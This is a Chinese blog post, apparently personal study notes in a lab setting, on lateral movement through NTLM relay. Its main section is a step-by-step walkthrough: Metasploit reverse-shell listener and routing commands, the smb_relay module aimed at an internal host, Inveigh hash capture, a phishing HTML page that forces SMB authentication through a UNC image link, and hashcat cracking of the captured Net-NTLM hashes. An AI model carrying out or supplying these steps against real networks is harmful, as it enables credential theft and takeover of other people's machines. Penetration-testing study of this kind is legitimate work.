11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

于 2024-02-21 18:51:47 发布
阅读量801 收藏 8
点赞数 14
分类专栏: 内网安全/渗透 文章标签: 网络安全 内网渗透 横向移动 中继攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65842464/article/details/136210459
版权
本文详细描述了如何通过NTLM中继攻击进行SMB权限提升,包括MSF工具的使用,如CS权限转移至MSF,利用smb_relay模块进行重发攻击,以及Inveigh嗅探和Hash破解的过程。
摘要由CSDN通过智能技术生成

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

5、受控主机输入命令:dir \\192.168.46.166\c$

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截 

 2.1、钓鱼触发

 3、破解密文

前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令   查看所需用户权限的进程号
steal_token 1668  切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992    #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166  kali  取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。

条件:两台主机用户密码一致

1、CS权限转给MSF: 

spawn l-msf

2、MSF: 

监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由: 

run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块: 

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

 Inveigh.exe

2、触发拦截 

dir \\192.168.3.x\c$
 2.1、钓鱼触发

http://192.168.3.31/1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

 3、破解密文

 hashcat -m 5600 hash pass.txt --show
++⁠⁠
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(Net-)NTLM Relay重放
Canterlot的博客
09-06 639
详细介绍了 NTLM Relayntlm重放)的原理和相关工具的使用方法
使用relay模式重放binlog,实现自动化
sinoimage的博客
08-20 363
背景:每天有外部来的binlog文件,需要在本地的MySQL环境做重放,在上次重放完成后Slave_SQL_Running_State显示Slave has read all relay log; waiting for more updates 。随后将新的binlog文件重命名未relay文件并按序号后延,也编辑了index文件添加新的relay文件编号,但不会继续重放,每次需要重新reset slave -> change master to,故编写此脚本来自动重放。 #!bin/bash.
内网横向移动NTLM-Relay重放&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 973
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
内网安全第一百三十四天
B_l_a_nk的博客
08-21 259
1、横向移动-NTLM-Relay To SMB 2、横向移动-NTLM-Inveigh Hash破解
内网渗透横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
m0_62207170的博客
05-01 1031
内网渗透横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
Windows下LM-Hash与NTLM-Hash
02-11
文档描述了Windows下LM HASH ,NTLM HASH生成原理和规则。 并利用Python脚本进行模拟。 详细描述了 挑战/响应模式(鉴权协议)的原理 详细描述了NTLM SMB通信流程 对内网渗透入门感兴趣的一定下载
信息安全_数据安全_NTLM_Relay_Is_Dead_Long_Live_NTL.pdf
08-22
信息安全_数据安全_NTLM_Relay_Is_Dead_Long_Live_NTL 安全设计 可信编译 网络安全 安全分析 web安全
NTLM-findir:基于NTLM的目录搜索工具
04-12
NTLM-findir NTLM-findir是我编写的简单python脚本,用于在需要NTLM基本身份验证的Web应用程序上执行目录暴力破解 此工具主要用于需要AD Creds登录的Intranet Web应用程序 用法 ███╗ ██╗████████╗...
windows登录口令存储所使用的LM和NTLM散列函数
12-16
windows登录口令存储所使用的LM和NTLM散列函数,作为操作系统学习和算法学习的辅助代码,在windowsXP上测试的结果是与系统登录口令的结果相一致。
Responder 利用
子曰小玖的博客
04-24 3229
总结与思考: 1. 利用Responder进行NTLMV2哈希的窃取 2. 使用Responder进行中继攻击成功后进行代码执行 3. 使用Responder进行凭证/哈希破解 4. 使用Responder进行快速SMB扫描 5. 使用Responder配合MSF反弹shell 6. LLMNR/NBT-NS攻击的防御 概述: Responder是对渗透测试工作者来说一个很棒的工...
NTLM-relay攻击
good good study
03-07 1928
在上一篇笔记中,介绍了ntlm网络认证的原理 ——> NTLM网络认证协议分析及Net-NTLMhash的获取,我们获取了Net-NTLMhash值,但是我们爆破不出密码,可以使用NTLM-relay攻击relay就是中继的意思。 NTLM Relay原理 在Client视角下,Attacker是它的服务端,模拟客户端完成访问请求。 在Server视角下,Attacker是它的客户端,伪造客户端完成身份验证。 攻击者所做的事情只是把所有客户端的请求relay到服务端,并把所有服务端.
2021-10-15NTLM中继攻击ntlm delay)
qq_45290991的博客
10-15 2325
终于结束了,虽然没有毕业后成为一名red进入鹅产,但是到了小产业也感觉很好。齐名虽然年轻,但是朝气蓬勃。 我觉得同事都很开心,搞渗透测试运维也不错驻场。 一、原理 1.1ntlm认证机制 参考资料:Windows本地认证和NTLM认证 总的来说就是windows下有2种认证机制,kerb和ntlmntlm又分为第一版本和第二版本),kb用于域内,一般是kb优先用,不行了域内才会开始用ntlm。win2000以后,ntlm认证方式的hash(密码)都会被存入到SAM文件中,域内会存入ntdl。tdl
NTLM Relay利用
qq_18811919的博客
03-07 3359
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
[内网渗透]—NTLM网络认证及NTLM-Relay攻击
Sentiment的博客
12-16 1325
Windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证而当我们访问同一局域网的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。
内网安全横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 928
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
重放攻击
jiangbin00cn的专栏
11-07 7213
重放攻击是计算机世界黑客常用的攻击方式之一,它的书面定义对不了解密码学的人来说比较抽象。我就通过一个故事来说明它吧!/////////////////////////////////////////故事的分割线/////////////////////////////////////////阿里巴巴和40大盗的故事人物:黑客:阿里巴巴用户:40大盗系统:宝库身份认证:石门故事情节:
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4519
作者:WHOAMI,转载于freebuf。 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
内网渗透横向移动总结(mimikatz域控)
墨痕诉清风的博客
08-23 2920
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
ntlm relay 原理
最新发布
09-17
NTLM Relay 是一种攻击技术,利用了 NTLM(Windows 网络身份验证协议)的漏洞。该攻击允许黑客在网络中伪装成受害者与服务器进行通信,从而获取敏感信息或执行一些恶意操作。 NTLM Relay 攻击的原理如下: 1. 受害计算机通过 NTLM 协议与服务器进行身份验证。在此过程中,受害计算机和服务器之间会进行一系列的挑战-响应验证,包括凭据传递和会话密钥生成。 2. 黑客在网络中进行监听,并截获受害计算机与服务器之间的 NTLM 通信数据。这可以通过中间人攻击或通过 ARP 欺骗攻击完成。 3. 黑客将截获的 NTLM 通信数据传输给目标服务器,冒充受害者的身份与服务器进行通信。 4. 目标服务器接收到黑客发送的伪造的验证请求并验证其身份。由于黑客已经截获到了真实的 NTLM 通信数据,因此服务器会认为该请求来自于受害者。 5. 服务器将响应返回给黑客,并黑客将该响应转发给受害计算机。 6. 受害计算机将响应解密并发送给黑客。 通过 NTLM Relay 攻击,黑客可以实施多种恶意操作,例如获取受害者的用户名和密码、执行远程命令、篡改数据等。这种攻击技术在企业中尤其危险,因为它可能导致黑客获取管理员权限并在网络中横向移动,进一步危害整个系统的安全。 为了防止 NTLM Relay 攻击,企业应采取以下措施:禁用 NTLM 认证、启用 Kerberos 认证、使用防火墙限制对 NTLM 端口的访问、使用多因素身份验证、及时修补操作系统中的漏洞并使用最新版本的软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值